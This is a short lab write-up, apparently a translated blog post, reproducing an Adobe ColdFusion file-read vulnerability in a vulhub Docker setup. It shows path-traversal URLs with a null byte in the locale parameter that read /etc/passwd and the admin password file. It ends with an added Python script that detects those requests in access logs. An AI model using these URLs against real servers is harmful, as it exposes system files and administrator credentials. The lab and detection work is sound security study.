Reproducing the Adobe ColdFusion File Read Vulnerability

Author: Internet

Adobe ColdFusion File Read Vulnerability

0x01. Environment Setup

Use vulhub to set up the vulnerable environment:

service docker start
docker-compose up -d

Check which ports are open:

docker-compose ps

Port 8500 is listening. Visit http://target_ip:8500/CFIDE/administrator/enter.cfm

The default password is admin.

0x02. Vulnerability Reproduction

Visit http://target_ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

Read the administrator console password: http://target_ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
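
A defender-side check for the two requests above, as an added example that is not part of the original post: it scans web access logs for requests under /CFIDE/administrator/ whose locale parameter carries a null byte or ../ segments. The log format, the sample lines and the language-tag pattern are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (common log format); the two flagged URLs are
# the requests shown in this write-up, the addresses are documentation IPs.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Apr/2021:22:03:01 +0000] "GET /CFIDE/administrator/enter.cfm HTTP/1.1" 200 5120',
    '192.0.2.10 - - [03/Apr/2021:22:04:13 +0000] "GET /CFIDE/administrator/enter.cfm'
    '?locale=../../../../../../../../../../etc/passwd%00en HTTP/1.1" 200 1873',
    '192.0.2.11 - - [03/Apr/2021:22:04:50 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 5120',
    '192.0.2.10 - - [03/Apr/2021:22:05:27 +0000] "GET /CFIDE/administrator/enter.cfm'
    '?locale=../../../../../../../lib/password.properties%00en HTTP/1.1" 200 412',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
ADMIN_PREFIX = "/cfide/administrator/"  # compared case-insensitively
# Assumption: a legitimate locale is a short language tag such as "en" or "zh_CN".
LOCALE_OK = re.compile(r"[A-Za-z]{2,3}(?:[_-][A-Za-z]{2,4})?")

def locale_findings(value):
    """Return the reasons a URL-decoded locale value is not a plain language tag."""
    reasons = []
    if "\x00" in value:
        reasons.append("null-byte")
    if re.search(r"\.\.[/\\]", value):
        reasons.append("dot-dot-segment")
    if not reasons and not LOCALE_OK.fullmatch(value):
        reasons.append("not-a-language-tag")
    return reasons

def scan(lines):
    """Return [(line_number, client_ip, reasons)] for suspicious admin requests."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().startswith(ADMIN_PREFIX):
            continue
        # parse_qsl percent-decodes each value, so %00 arrives as "\x00".
        for key, val in parse_qsl(url.query, keep_blank_values=True):
            reasons = locale_findings(val) if key.lower() == "locale" else []
            if reasons:
                hits.append((n, line.split()[0], reasons))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same allow-list pattern can be enforced in front of the application, rejecting any locale value that is not a plain language tag before it reaches ColdFusion.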


Source: https://www.cnblogs.com/-Anguvia-/p/14615131.html